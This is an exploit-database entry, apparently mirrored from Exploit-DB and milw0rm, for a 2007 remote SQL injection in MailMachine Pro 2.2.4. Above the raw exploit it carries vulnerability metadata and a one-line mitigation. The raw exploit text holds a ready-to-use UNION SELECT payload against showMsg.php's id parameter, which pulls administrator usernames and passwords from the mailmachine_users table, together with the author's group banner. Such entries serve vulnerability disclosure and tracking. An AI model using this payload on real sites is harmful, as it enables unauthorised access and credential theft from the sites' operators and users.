header-logo
Suggest Exploit
vendor:
MailMachine Pro
by:
MhZ91
7.5
CVSS
HIGH
Remote Sql Injection
CWE
Product Name: MailMachine Pro
Affected Version From: 2.2.2004
Affected Version To: 2.2.2004
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MailMachine Pro 2.2.4 โ€“ Remote Sql Injection

The MailMachine Pro 2.2.4 version is vulnerable to a remote SQL injection attack. By manipulating the 'id' parameter in the 'showMsg.php' page, an attacker can execute arbitrary SQL queries and retrieve sensitive information, such as user credentials.

Mitigation:

Update to a patched version of MailMachine Pro to mitigate this vulnerability.
Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------

Http://www.inj3ct-it.org        Staff[at]inj3ct-it[dot]org   

---------------------------------------------------------------

          Remote Sql Injection

---------------------------------------------------------------

# Author: MhZ91
# Title: MailMachine Pro 2.2.4 - Remote Sql Injection
# Download: http://webgraf.ru/2007/11/27/mailmachine_pro_224.html
# Bug: Remote Sql Injection
# Info: Mail Machine Pro is a professional mailing list manager written in php. This program features a web-based setup wizard, unlimited lists and subscribers, unlimited admins, personalization of newsletters with user data, autoreplies, scheduled mailings, email attachments, link tracking, bounced email management, opt-in/out, optional SMTP sending, mailing lists stats, import/export of subscriber list, automatic backup and restore, real-time message queue and more.
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

http://[site]/showMsg.php?id=-1+union+select+1,2,3,4,5,6,concat(user_id,char(58),password),8,9,10+from+mailmachine_users/*

Whit this u get user:password of the admin

I think there is other sql injection xD

Bye.. and visit http://www.inj3ct-it.org !!

---------------------------------------------------------------

# milw0rm.com [2007-12-25]

Navigation

Suggest Exploit

Services By CQR

cqrsecured